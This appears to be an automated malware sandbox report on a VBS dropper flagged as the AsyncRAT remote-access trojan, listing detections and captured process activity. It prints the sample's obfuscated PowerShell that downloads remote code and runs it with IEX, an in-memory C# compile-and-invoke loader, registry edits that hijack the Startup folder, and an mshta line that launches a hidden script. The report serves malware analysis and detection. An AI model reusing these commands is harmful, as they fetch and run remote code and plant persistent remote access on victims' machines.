Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)$H1 = New-Object Byte[](30720)$jtwC.Read($H1, 0, 30720) | Out-Null[Byte[]] $MyPt = [System.IO.Path]::([System.Threading.Thread]::'GetDomain'().'Load'($H1).'EntryPoint'.Invoke($Null,$Null))[Object[]] $Params=@($MyPt.Replace("Framework64","Framework") ,$H1)[System.Threading.Thread]::Sleep(1000)return $T.GetMethod('Run').Invoke($null, $Params)} catch { }Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\ServiceState\";Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\ServiceState\";start-sleep 7Start-Process -FilePath C:\ProgramData\ServiceState\WindowsStateRepositoryCore.vbs@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="3.0"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPane
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $gzipStream.CopyTo( $output ) $gzipStream.Close()$input.Close()[byte[]] $byteOutArray = $output.ToArray() return $byteOutArray }}function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'$hello = "Com<><><><><><><".Replace("<><><><><><><","pilerVersion")$v4 = "v4.0"$dictionary.Add($hello, $v4)$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters$v1 = "Sys@@@".Replace("@@@","tem.dll")$CompilerParametres.ReferencedAssemblies.Add($v1)$CompilerParametres.ReferencedAssemblies.Add("System.!@!$^^%^%**&*&*$$%$%$".Replace("!@!$^^%^%**&*&*$$%$%$","Management.dll"))$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")$CompilerParametres.ReferencedAssemblies.Add("mscorlib.dll")$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")$CompilerParametres.IncludeDebugInformation = $false$CompilerParametres.GenerateExecutable = $false$CompilerParametres.GenerateInMemory = $true$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"$BB = Decompress($BB)[System.CodeDom.Compiler.CompilerResults] $CompilerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [System.Text.Encoding]::Default.GetString($BB))[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)[Byte[]] $Bytes = 
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: KDH32783JHC73287SDF87.VBS Static file information: File size 1327456 > 1048576
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp
Source: Binary string: yDictionary`2<Module>System.IOCosturamscorlibSystem.Collections.GenericReadThreadLoadAddisAttachedInterlockedcostura.entrypointdll.pdb.compressedcostura.entrypointdll.dll.compressedSynchronizeddefaultInstancesourceCompressionModeExchangenullCacheIDisposableRuntimeTypeHandleGetTypeFromHandleget_NameGetNamerequestedAssemblyNamefullnameTypeget_Cultureset_CultureresourceCulturecultureApplicationSettingsBaseDisposeEditorBrowsableStateWriteSTAThreadAttributeCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteTryGetValuevalueadd_AssemblyResolveFodyTest.exeSystem.ThreadingSystem.Runtime.VersioningCultureToStringAttachget_LengthEndsWithnullCacheLockSystem.ComponentModelEntryPointDllReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamProgramset_ItemSystemresourceManMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.ConfigurationSystem.GlobalizationSystem.Reflectionset_PositionStringComparisonRunCopyToget_CultureInfoSleepAssemblyLoadersenderget_ResourceManagerResolveEventHandlerSystem.CodeDom.CompilerEnter.ctor.cctorMonitorSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesReadFromEmbeddedResourcesFodyTest.Properties.Resources.resourcesDebuggingModesGetAssembliesFodyTest.PropertiesresourceNamessymbolNamesassemblyNamesget_FlagsAssemblyNameFlagsSettingsResolveEventArgsEqualsFormatObjectExitget_DefaultToLowerInvariantFodyTestProcessedByFodyContainsKeyget_AssemblyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyEntryIsNullOrEmpty;FodyTest.Properties.Resources source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.455396279.000001F46A6B3000.00000004.00000001.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp
Source: Binary string: $costura.entrypointdll.pdb.compressed source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: costura.entrypointdll.pdb.compressed source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: EntryPointDll.pdb source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.455681360.000001F46A718000.00000004.00000001.sdmp
Source: Binary string: entrypointdllIcostura.entrypointdll.dll.compressedIcostura.entrypointdll.pdb.compressed source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Public\FodyTest\FodyTest\obj\Debug\FodyTest.pdb source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: omation.pdb@ source: powershell.exe, 00000002.00000002.455681360.000001F46A718000.00000004.00000001.sdmp
Source: Binary string: c:\dev\sqlite\dotnet\obj\2010\System.Data.SQLite.2010\Release\System.Data.SQLite.pdb source: RegAsm.exe, 0000001B.00000002.891515046.0000000006F80000.00000004.00020000.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");IWshShell3.Run("powershell -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParame", "0")
Yara detected Costura Assembly Loader
Source: Yara match File source: 27.2.RegAsm.exe.70a0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.RegAsm.exe.70a0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.891602218.00000000070A0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.888448368.0000000003161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5644, type: MEMORYSTR
.NET source code contains potential unpacker
Source: 27.2.RegAsm.exe.400000.0.unpack, Client/Handle_Packet/Packet.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta vbscript:Execute('CreateObject(''WScript.Shell'').Run ''powershell -ExecutionPolicy Bypass & 'C'+':'+'\'+'U'+'s'+'e'+'r'+'s'+'\'+'P'+'u'+'b'+'l'+'i'+'c'+'\Service.ps1''', 0:close')
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD03C192B2 push ebp; ret 2_2_00007FFD03C19320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03C20595 pushfd ; retf 10_2_00007FFD03C205A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03C272DB push ebx; iretd 10_2_00007FFD03C2731A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03C27EDB push ebx; ret 10_2_00007FFD03C27F1A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE080A pushfd ; retf 10_2_00007FFD03CE080C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE0008 pushfd ; retf 10_2_00007FFD03CE0102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE4DBC pushad ; iretd 10_2_00007FFD03CE4DBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE4DD1 pushad ; iretd 10_2_00007FFD03CE4DD2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE076A pushfd ; retf 10_2_00007FFD03CE0772
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE8B3C pushad ; iretd 10_2_00007FFD03CE8B49
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE473D push ss; iretd 10_2_00007FFD03CE473E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE00DD pushfd ; retf 10_2_00007FFD03CE0102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE8B17 pushad ; iretd 10_2_00007FFD03CE8B1B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03CE08B9 pushfd ; retf 10_2_00007FFD03CE08E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03EE0E5C pushad ; iretd 10_2_00007FFD03EE0E5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD03EE0E71 pushad ; iretd 10_2_00007FFD03EE0E72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_070623C0 push E8FFFFFFh; retf 27_2_070623C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_071F8570 push edx; retn 0008h 27_2_071F85A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_07240668 pushfd ; ret 27_2_07240669
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_072411B8 pushad ; retf 27_2_072411C1
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.cmdline'

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.dll

Boot Survival:

Yara detected AsyncRAT
Source: Yara match File source: 27.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.886169058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.888448368.0000000003161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5644, type: MEMORYSTR
Creates an undocumented autostart registry key
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value created or modified: HKEY_CURRENT_USER\Software\0B3678293025AA5E13BB 405813D04B53574AB8C9721795E9FD705273487C852B7F4545FB875DA09C7350
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
